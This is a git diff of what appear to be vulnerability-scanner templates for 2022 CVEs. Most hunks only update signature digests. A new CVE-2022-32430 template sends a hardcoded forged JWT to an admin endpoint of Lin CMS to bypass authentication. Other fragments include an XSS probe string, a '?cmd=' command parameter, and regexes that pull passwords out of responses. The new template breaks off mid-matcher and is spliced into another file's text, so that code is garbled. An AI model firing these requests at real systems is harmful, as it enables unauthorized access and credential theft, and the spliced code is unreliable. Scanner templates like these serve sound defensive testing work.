4a0a00473045022100c0740d0f7e519a814fd4636e2895ca6a67d3448bee2fa67fb35b6b6df5e13768022054d2fbb343d640b7c2207a740fd70d71f049e64bfda54743f43eec0e79a7156f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e1cbf9f22134eb78b7d8269338039056f10e9a1d459561bfeb4a4273ceb08d4302203b2f1ddc9b80bac96a44fba68d9c28c248e12ef89a720e1ce2a1921fc0fb9a63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index 4db3362f93..4e8a29bb38 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 500 -# digest: 490a00463044022023957a85ac2b065baec58893e75d6c1fc4d31daa7d50a73362e59052003b506202205f0add7535e7568777b8b49144ac11150bf177bdb8ddd6ef64f64b3e2544def6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d2611a4bbd37c92e10c7c04c5287817c5276dc06e9595aa43f4c7e2d7f9d6f32022100e8b1382edb51ac7f80e2006d4ef501e49d529af2ea63b39cb9842b574f17f6db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml index f84be2943d..b411693f94 100644 --- a/http/cves/2022/CVE-2022-31126.yaml +++ b/http/cves/2022/CVE-2022-31126.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204bdde9e07681642803ad6407786682f47d2bdb0b0f0d1050c33505027d4e255702204494daedf17578c2e16f7a2ee06a48cc46e3e0fe8e8cb17421db8cc5dd72beaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022035556f4f3cd81f9c1bc3e3f30b1581e866314ebc8a754dc6d59d7454b6bd68dd02210091e38ffa5218626fa5a430bdff1748cf16744eb74873df46f70e9fca805896c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31269.yaml b/http/cves/2022/CVE-2022-31269.yaml index e1f629eee9..5c4f56238d 100644 --- a/http/cves/2022/CVE-2022-31269.yaml +++ b/http/cves/2022/CVE-2022-31269.yaml @@ -58,4 +58,4 @@ http: - type: regex regex: - Password='(.+?)' -# digest: 4a0a00473045022100b9df43b4cf0c7804ca6015a6e7dc82aa0d763939cefa4da5dd0b45b34f5e41a302202a883192f52bb59599f6897770c2c66bf2716ab08c3247d7e63a1b12e1281e54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220211b8b052d35c8c0e6a761490e6c1b685d1d56b894054fd40f62eb2b07c5ffa8022100a1cd1709ff09731bac0575fa634a80cf43322d879c77cd786771c0de881a2f50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31299.yaml b/http/cves/2022/CVE-2022-31299.yaml index c6bb460d0d..c2e724eac2 100644 --- a/http/cves/2022/CVE-2022-31299.yaml +++ b/http/cves/2022/CVE-2022-31299.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022051f630b14725c61ea41071291aa87d8231f3de7a8d5ea2ce94743afcdf174ca40220451678b0ec7ac82863841c5fc887196f323ad716fd5cf62ee46dddc4e7ed2e05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220107082951fb57d51f08b7e519d2eddac32a210758fa0a1e697b5481071bcdf4d0220106c1631d6f85f20235fddd9930929c3bd344de8de936b4a700dd0e93f9d9912:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31373.yaml b/http/cves/2022/CVE-2022-31373.yaml index a48dc93224..9cd6fdedb7 100644 --- a/http/cves/2022/CVE-2022-31373.yaml +++ b/http/cves/2022/CVE-2022-31373.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220598956615bef8d9d89f474c8d1f589e6749fefb4868ecff67ac7e542febcafc102210088bb19f422dbd09f2a62224bb38eda92414953d7ee294d01e9846a75aa2fbc9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e198facad20dc156feda279d1ce49117cb3d0baf80f67f7e1309efc885bbfe0e022002895be93b1e631fb4d53c0c2f701b0db0afe312b24eca373958d7eb78c65b88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-3142.yaml b/http/cves/2022/CVE-2022-3142.yaml index 230d9562c9..32a47a3e0f 100644 --- a/http/cves/2022/CVE-2022-3142.yaml +++ b/http/cves/2022/CVE-2022-3142.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "NEX-Forms")' - 'contains(content_type_2, "text/html")' condition: and -# digest: 4a0a00473045022100cc36195a9053f41eba96fc8e1940f79ef8d164edebb90245b23e54d7ab65b23502205f75d12988ea487aeec8e0be4738eef9144e3768120ea539cceab31629afe5d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205b7faf48f4f1f5800cf6e79acf865fd5728af61add5cb2e3d656eab6c6a58cab022100be6bb84cb11f81bb21838b305a5137642c88f1f2c754b41bd8c067ae4eda6f34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31474.yaml b/http/cves/2022/CVE-2022-31474.yaml index 1f90b581a0..946199f930 100644 --- a/http/cves/2022/CVE-2022-31474.yaml +++ b/http/cves/2022/CVE-2022-31474.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c70adfac9605cec479fd38be9a3aac39ebc7f8bf3c5abce4e91ad6bf155b958302205ce5c16f724427ac1d9a94b43bcd14ff015436b2a0219c9c0cc584e9e1f96d3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ecf44787bd6300f50e4a767ffe601dd4051e6dadfe6cd36dcbb948a853a44dbf02205339443407fd4fb29ff75bd9f6565a7dc2d382e699cca5b76c135da1b219d1cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31656.yaml b/http/cves/2022/CVE-2022-31656.yaml index 1d3334694b..f77ae5c7be 100644 --- a/http/cves/2022/CVE-2022-31656.yaml +++ b/http/cves/2022/CVE-2022-31656.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100db5a9e74fcbcbc7e2b6efd31be308025292ef3ba09d76467841471d7bc7a793f0221009fb82c140febaac1325597d164644ff239dbc6601d4871545eb5931b750d16b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203fc99ab76b85fe7af4c15382225072a02b8545f4dcec877333d9a9111e35ecca0220299ac713abf18e223cc14b635004720ca4bf1bc1ce09b5add49a3dc3ab98cd3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31798.yaml b/http/cves/2022/CVE-2022-31798.yaml index d411b9c192..63e878830a 100644 --- a/http/cves/2022/CVE-2022-31798.yaml +++ b/http/cves/2022/CVE-2022-31798.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220558dd8e1b6f874438c332b397cea8d9fc617b56137ef97c5d400145ecf85412802206930a4c33c5f3b2d0f070ca45d290f1d586e2cf5ef1b67d828ac0610ca2917ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202b941581c6f68df980a8270b98dd682d5d4d930e77ed81d8c35c21b892d9a6dd02203a358f1b032aaf21786d73f91dd64abf62f5a234c1350ac6645838da8a471757:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31854.yaml b/http/cves/2022/CVE-2022-31854.yaml index efca6e1075..bbee69b1c5 100644 --- a/http/cves/2022/CVE-2022-31854.yaml +++ b/http/cves/2022/CVE-2022-31854.yaml @@ -92,4 +92,4 @@ http: regex: - name="CSRF_token" value="([0-9a-zA-Z]+)"/> internal: true -# digest: 4a0a00473045022100c7503c1ef4e4cf77c282acb017d12402a727925b2c9cf8f24eb0fbbab8f5db5e02204c5a12d25b0151fc94f1203d590a4061f81003d4897d0913d00eadb265e4f72e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200fc44f8569c5b730415b2491b31a8709cd4a5c096a8e8dd650d1d58108709768022004858ff3b8255a696b01d2443eaf22d347e26d244a63611c77aee1c00133b538:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31978.yaml b/http/cves/2022/CVE-2022-31978.yaml index faad06e36d..7130952dc8 100644 --- a/http/cves/2022/CVE-2022-31978.yaml +++ b/http/cves/2022/CVE-2022-31978.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "status\":\"success")' condition: and -# digest: 4a0a0047304502203831aeff95ddf55f9a2955279fd1564f1b623e6df3170f360f6bcf28af020275022100c4ef3f283f44a5473de0e42156a8b4fb37fa64b25542d63fc45571fb0dcbffa3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210082920a5d3562240e8e93e567926bda08298baef90f3839368b24000a172d9c4f022100d9c68292bb99fd7bd81974408e1931f6f60e746db4fb80eac1150e70edb76316:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31981.yaml b/http/cves/2022/CVE-2022-31981.yaml index 836a3bbfb4..63697be4ed 100644 --- a/http/cves/2022/CVE-2022-31981.yaml +++ b/http/cves/2022/CVE-2022-31981.yaml @@ -42,4 +42,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Control Teams")' condition: and -# digest: 4a0a00473045022053bf03e770832c1ef6105cf34da3babeb7ab6589b3d2000421fea6b911d2d050022100ccc0c719605f079d8ac53d079e385952f6c202679bf895c39cc696a8def2aff6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d2b77265247a844a543151ac19f0fe136cefd62457e9c581791c7336c9fa50b002200fc31e19654ac1e011b7104483458e1e4e86216cb0c341d0833cf50fce833ce1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31982.yaml b/http/cves/2022/CVE-2022-31982.yaml index 1893bfceed..ec3c541336 100644 --- a/http/cves/2022/CVE-2022-31982.yaml +++ b/http/cves/2022/CVE-2022-31982.yaml @@ -42,4 +42,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Request Detail")' condition: and -# digest: 4a0a0047304502203027f38bd0c9023ed9ba3fda83800749d0a27b1c43164db6e39527d8a8ce9ce5022100b8cd78b1364c44138eaefce681f67c12d38eb16034013529c84c3f5c15f0d2d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022010dde84fca947b7396161fd4683955e87f7f25ea2671996f04fd6011e69346220220781574af1cca7ad8a241f7d8ab76479836e61236b6b46d7a4f9136cea968d23b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-31984.yaml b/http/cves/2022/CVE-2022-31984.yaml index d32244b9e5..301514c200 100644 --- a/http/cves/2022/CVE-2022-31984.yaml +++ b/http/cves/2022/CVE-2022-31984.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220335da5f70cacd62f923b6a9c87d10a164226bd63228ca77eca7a93b98f21e4dd022100b1503788bdabab77034a49812faaae299696bd36eefec2125bd5c2903842adb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c27b0c9f46ef199d8a55356b8e1c6b8e6d55e3e55a7328af4b676cf6d33f3be502205b712981499f0d873739591c3fe20fba293ffe5b84d29e3fe4d229bbbb989a2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32015.yaml b/http/cves/2022/CVE-2022-32015.yaml index 2f0fa798ac..3fff028ab9 100644 --- a/http/cves/2022/CVE-2022-32015.yaml +++ b/http/cves/2022/CVE-2022-32015.yaml @@ -39,4 +39,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4a0a00473045022100923790778fb88972889d0fa17f499e1ad20faa8bac7208d43830d15a173dc8ff02201933aa143887a5473374183052db35fe3e75089fcdc41d19c77073541c26fb54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c34036939ef2413c02af88cb8e86ecd6b3be7f27866b7d0ca21d3b7a269e47a8022100cf88f059ea7f102348f18a69cc9b78e11fc69e56a09b123e5a590fee4b261619:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32018.yaml b/http/cves/2022/CVE-2022-32018.yaml index 3f0068e603..03f4f75f3c 100644 --- a/http/cves/2022/CVE-2022-32018.yaml +++ b/http/cves/2022/CVE-2022-32018.yaml @@ -41,4 +41,4 @@ http: part: body words: - '{{md5({{num}})}}' -# digest: 4b0a00483046022100c6616ccd95b586ace62fbb754569e41b2c1f0458a7f93b543772f0e4498b221d022100acfbc058551213614cb36d6091e8761c51f5ac95ae95d129c27cb1605ac9fd27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205ba4dd1e28ba762599b6a5ab360d76fec10ab36095eea39b5350f66c6ccfdd4a022100e512574c97e4dd07fb068fe1ad699e8401d927211f5932a38f70608192d06c77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32025.yaml b/http/cves/2022/CVE-2022-32025.yaml index 4e1b75a49f..14765055c5 100644 --- a/http/cves/2022/CVE-2022-32025.yaml +++ b/http/cves/2022/CVE-2022-32025.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c79423b1728896e43b78d63cc10676ff0ddf3869f496b573db53dc8f2c245e4a022041516a75d318167a781a7357063f72975ef34093c44a8be0e64835e6822a1928:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220566cc50ee5f50c4a96f3e96207530f5e6f169affed02f065aecacbfec179891302202c5e77606826ec2964e65a363ae6cb5339c0746c36c2faf2c312ebba75307610:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32026.yaml b/http/cves/2022/CVE-2022-32026.yaml index d9828ea4fe..d770372ee9 100644 --- a/http/cves/2022/CVE-2022-32026.yaml +++ b/http/cves/2022/CVE-2022-32026.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b8fe53bd5d3fa25e203ccb05e93d5972f5254d97278381bc1c8b8e84c1c0251d022100cc88051a592ba29254f4daf63890fbbc2bfa9a66859297abe6e0f92df16476fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d8d1ce0a8afb0fd0d8764c020301f0bed489c76f1e00e810d5e77dcb9065adb0220745a0985676455f645e3f98ac502002ec5c0ee377c9822b23ec2081b0c2bfd3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32028.yaml b/http/cves/2022/CVE-2022-32028.yaml index affb9681aa..bd9a8b794a 100644 --- a/http/cves/2022/CVE-2022-32028.yaml +++ b/http/cves/2022/CVE-2022-32028.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eb797927bfb8812e35a51a970d46c8a51ccaa4bf4f19132d00c7135b948550e3022041347a43efd544ecbda0a81aeb125415f4f6e97b34c142383ad75796fe9cb840:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df821f457de97d0880a4be9f79b9a08294cffaaf8b36b5f573415af2fcc073ec022100c1bf7e95967be2f3096198251b61f794654b302d661afc789ad82c93f886f2e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32195.yaml b/http/cves/2022/CVE-2022-32195.yaml index 4684743d0f..a06e93bdc7 100644 --- a/http/cves/2022/CVE-2022-32195.yaml +++ b/http/cves/2022/CVE-2022-32195.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206e052b2813a5b21a5d0f9aa21720244c3155edd8a18fadf13a57d3b775ac074f022100f00e3ef1b398885ff911a7cd9a8da184daae792bd243e16f41fde6f2901d8920:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d1e44091a63188927cbb7a9f6b8d42e7480fcfe75384863173fdee98142046c002210080ce0e4cfa487b2b08f8891139e605f8293b0b80a4250b609f1c9ff37505ffb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32409.yaml b/http/cves/2022/CVE-2022-32409.yaml index 399023cf2b..970cc96d0e 100644 --- a/http/cves/2022/CVE-2022-32409.yaml +++ b/http/cves/2022/CVE-2022-32409.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b8e4beac5f08237d2227bdfad4dbb802bb9067b3d50eeb4a4c01357f8dd69feb022053c2334ae2ef59736d1494ebc90eca6d6ab54900c26b80d93084dfb347b5f9a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072e312e8df1571351e7a21ca6317934960724f0071495fe4169ca5b013300dcd022100cc5ac2a8a33a0acc037a5db55a65ebb9f5ae1937caac9aededb4a8a59ab3ec56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32429.yaml b/http/cves/2022/CVE-2022-32429.yaml index 30924d16b2..f946f1268c 100644 --- a/http/cves/2022/CVE-2022-32429.yaml +++ b/http/cves/2022/CVE-2022-32429.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220344ce3d26e66f797ac841d2631a458c1257a447c8d96304f51b058e3855b82f0022100d70d54d67eb0c38ea7aeba8d1f3f6cfd022d68447bbc490d325886274f823b89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f40c78cc0f0a72c1f287552733d6a8029c75a95273b1d2e8e9c7b02c553392850220647bafa53296ecf2b294942dd964b0f8ea4c278bd17ba8b267a8ecc5fad97fea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-32430.yaml b/http/cves/2022/CVE-2022-32430.yaml new file mode 100644 index 0000000000..98550c804a --- /dev/null +++ b/http/cves/2022/CVE-2022-32430.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-32430 + +info: + name: Lin CMS Spring Boot - Default JWT Token + author: DhiyaneshDK + severity: high + description: | + An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access the backend information and functions within the application. + reference: + - https://github.com/TaleLin/lin-cms-spring-boot + - https://web.archive.org/web/20220721190946/https://www.mesec.cn/archives/277 + - https://nvd.nist.gov/vuln/detail/CVE-2022-32430 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-32430 + epss-score: 0.00227 + epss-percentile: 0.60316 + cpe: cpe:2.3:a:talelin:lin-cms-spring-boot:0.2.1:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: talelin + product: lin-cms-spring-boot + fofa-query: body="心上无垢,林间有风" + tags: cve,cve2022,lin-cms,auth-bypass + +http: + - method: GET + path: + - "{{BaseURL}}/cms/admin/group/all" + headers: + Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"id":' + - '"name":' + - '"level":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'alert(document.domain)<\"?cmd=') condition: and -# digest: 4b0a00483046022100812a156d314d21db6ff92860fd49fabd6c94ef6f8c45d43d9d0dc23f310af353022100eda1f9b12a62edfd8c86d09f273e9ef69ebe5c45b6a41eb094c734d078e6ccce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f0f38f1056959a80fda5a1d4ced07d7ae1ac102a7ba4c692c0b0150a62461f0502205b4da7a44c66b407918128ef1f68b82728505e5d40ef1467678a122bd7212b0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-33174.yaml b/http/cves/2022/CVE-2022-33174.yaml index 17c5ced2d1..6bd02c9441 100644 --- a/http/cves/2022/CVE-2022-33174.yaml +++ b/http/cves/2022/CVE-2022-33174.yaml @@ -57,4 +57,4 @@ http: - '([A-Z0-9a-z]+)<\/sys\.passwd>' - '([a-z]+)<\/sys\.su\.name>' part: body -# digest: 4a0a0047304502204da19e070210121750219bb8972e10767f2f8eeccb3f68d5586232851cf2a0f4022100ac3dc0197eb0668e5caba26bbdf68b5257c4485a623c29d77b4bd6dbc2cd66d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205f3721d4d1cc1bd01d55480d74005f566999d1eb1f7aef883abe68afa60e1d4102202cd3dede0c67c2903cde37b3f54d432dcbb537f4bfb2e29d4ee779cac0609d99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-33891.yaml b/http/cves/2022/CVE-2022-33891.yaml index 9a80d1ca74..0e8cd9ebfd 100644 --- a/http/cves/2022/CVE-2022-33891.yaml +++ b/http/cves/2022/CVE-2022-33891.yaml @@ -45,4 +45,4 @@ http: part: body words: - "19833-2202-EVC" -# digest: 4a0a00473045022100c1235eac532c6d726073650001ee75a510e3d2b869c6174b06e4a249f1d236090220564440e9e87fc5f90b25cfc4108c5aa04b592bc0e6c584c01fec85b312622f08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f22344f29260306acf31af5a7c61265f388bbd61bf8ad8e96f065030814ca986022035526b485b24e7be4616c64d3b5be9e9abd37bdbe893ca3ca0027058e83ff4c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-33901.yaml b/http/cves/2022/CVE-2022-33901.yaml index fb79a170a9..2294352f6f 100644 --- a/http/cves/2022/CVE-2022-33901.yaml +++ b/http/cves/2022/CVE-2022-33901.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009e7d6447a96af2e01307e169b8162352aa613f4058b44dd69b21b3b66c910ae0022100a6329cf638722c57bf219a244e00118af38d0519e6cc459beb4036714080efd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202ae9ccfcd2d44fcb8006ba953a197c97d4ecfacdad1348585abddafee07bb83102204e83d79dbe8ee0856aa30e9d9833f4f2d553fd603b0952a23e5c83d208c62401:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34045.yaml b/http/cves/2022/CVE-2022-34045.yaml index d89fbb2666..c894429126 100644 --- a/http/cves/2022/CVE-2022-34045.yaml +++ b/http/cves/2022/CVE-2022-34045.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ff8c8f9269584f82a8eadc37cfee43115bfe6c84561f6ad9126e6b0cac05bc53022100f093861b1c22ef08f6be400af7a3064ab2a20f5417558812bc92d57cc8b9ba5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb0b8aa54fde332f8cd44ca55dfda68ee8eaad6e9c47f58cd20feb3873a04ac402206045d384f557a00bd359d936396b51e46a94bd70a5ff2e253f622d481a211aab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34046.yaml b/http/cves/2022/CVE-2022-34046.yaml index dd16fd0513..b1060a2f78 100644 --- a/http/cves/2022/CVE-2022-34046.yaml +++ b/http/cves/2022/CVE-2022-34046.yaml @@ -55,4 +55,4 @@ http: - type: regex regex: - 'syspasswd="(.+?)"' -# digest: 4a0a0047304502203f582a876dbcc442ef4a741a5c1c7bfc1a78d2ba93422bc6e3052111e7f9092c0221008d2e5aab5db4c40f2132a2a9549f596fc55eda2de4b4011663eb140b585ec1da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220012d32e7af94355d9d79d3210f97d2bdf114e7d81c8a425f14611b6898afdcb2022100d2e6dd7fe5b5f462e9bccc0179f3417fa34f94d1006498add8171cba0ec4af4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34047.yaml b/http/cves/2022/CVE-2022-34047.yaml index 140890449d..954b71dae4 100644 --- a/http/cves/2022/CVE-2022-34047.yaml +++ b/http/cves/2022/CVE-2022-34047.yaml @@ -55,4 +55,4 @@ http: - type: regex regex: - 'syspasswd="(.+?)"' -# digest: 4b0a00483046022100f8c96a0f11115d7696e24431851a0de25084a6ae28e1d70406d79ba8753ef3c102210089171cdbebc5ff0adf4b24f903d56094eb726dcd332763acb457fe901bae269b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009d579af2f6d3d5044fff3d3ba8ae41ae23b08238a57030a5aca5ce2e072c848f02210096fb879980b385c7240a0b97b5ed0b21d8a2e4ab835977407c3e156daaece404:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34093.yaml b/http/cves/2022/CVE-2022-34093.yaml index fab09459b0..d7d192cc8f 100644 --- a/http/cves/2022/CVE-2022-34093.yaml +++ b/http/cves/2022/CVE-2022-34093.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")' condition: and -# digest: 4a0a00473045022100dbc6ce2de688488c35fd557d91bc2e93e97e7f9a4a2c6fe7947bd7e49fee359c022003157f0e302d9c1cdef4baecae0844345248c3527c222fa4f4b5677848b1d178:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b6c16f44954588e4bae35bb1d81fb7146230861817ce49f5a3de2f00e70a282a02204ac735c905d496f7e25c3534786304a13f57730db0a36a2c722fa4471bb64fa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34094.yaml b/http/cves/2022/CVE-2022-34094.yaml index a7d0ed715b..41df93a9f5 100644 --- a/http/cves/2022/CVE-2022-34094.yaml +++ b/http/cves/2022/CVE-2022-34094.yaml @@ -39,4 +39,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "%3Cscript%3Ealert(document.domain)%3C/script%3E", "Invalid consumer key")' condition: and -# digest: 4a0a0047304502206b926ae40129bc185063ce31d660168a1bbbdf28bfc7b867950c34c7991b3c54022100c18436b89b9f38018733cda4a02249268c021bd415fe50b3dcc2bc4fda14ce1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ae011287587c98e490b0c70b0c3ea88250a2b29a79c656693b056f3adbda9acd022035c0bf42383d419c05913b95afad80e3a7bf9eecc3689f24b92069aff39fc3af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34121.yaml b/http/cves/2022/CVE-2022-34121.yaml index 7b1cb461a6..6c023aa399 100644 --- a/http/cves/2022/CVE-2022-34121.yaml +++ b/http/cves/2022/CVE-2022-34121.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022060946b84a27df96b610dc435dd80310479c522a264713dbb45e514ed3caf1806022012f8398e44044ef7bce354d3ecc14b0427039eb48253e9e88ee5dca47416938e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c5726ce028ac359181e6ce2ccd45251d4715c1c9c936d2ef67b588f2159e7cc9022100c49a6fcb006b5de199ccc32a6d1716a713f8de4f24346ba4578c705b4f225245:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34576.yaml b/http/cves/2022/CVE-2022-34576.yaml index dffb19d3ba..77c1005781 100644 --- a/http/cves/2022/CVE-2022-34576.yaml +++ b/http/cves/2022/CVE-2022-34576.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022011dbdae05a85af686cd64b2e8014524eec8d64e6bd6e8bb67d669608843af61f02210083ee0837704d7851c89f76c97740d9736d8b7d6e016a2961a5a0864e31ef154c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022008737e106e5c8fe1e9e117f6bc57f005c3fb3b9810552455947f1568b74df85a022016b0f75b1b14036e1e8e1ce246588f322c3dbd791bc9db34ffead55bef452f8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-34590.yaml b/http/cves/2022/CVE-2022-34590.yaml index 558ac72187..7ff5fdfdac 100644 --- a/http/cves/2022/CVE-2022-34590.yaml +++ b/http/cves/2022/CVE-2022-34590.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 